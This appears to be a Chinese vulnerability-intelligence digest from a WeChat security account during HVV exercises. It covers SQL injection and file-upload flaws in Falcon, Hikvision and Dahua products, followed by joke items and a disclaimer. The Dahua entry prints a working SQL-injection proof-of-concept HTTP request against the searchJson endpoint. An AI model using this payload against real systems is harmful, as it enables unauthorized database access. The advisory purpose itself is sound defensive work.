漏洞情报
猎鹰安全科技终端安全系统 SQL 注入漏洞( XVE-2023-5913)
影响版本:version ≤ 9.0 2022.10.18.12
临时缓解措施:
使用网络 ACL 限制访问来源, 加强监测。
POC未公开
海康威视 iSecure Center 综合安防管理平台文件上传漏洞
漏洞信息:
https://x.threatbook.com/v5/vul/1f69af7477471f917b0a909d5164f8c9827953ebd6d17bb5acfd507a704f2a619e446f9c551580ed5cf43f5a27d11aaa
大华智慧园区综合管理平台 searchJson SQL注入漏洞
POC已公开
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close
HVV趣闻
钓鱼?不存在的,他只是想看超短裙。
风险转移,背锅侠你好。
反差,反差?!
钓鱼?他只是想请你吃饭,顺便借你的工作机。
WPS晚上十一点自动修复,大家不用害怕了。
紧急排查!
交流群
交流群获取各种情报
①群已满,扫码添加机器人助手,回复"HW2"进入交流②群!
原文始发于微信公众号(小艾搞安全):HVV第二天摸鱼漏洞情报指南
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论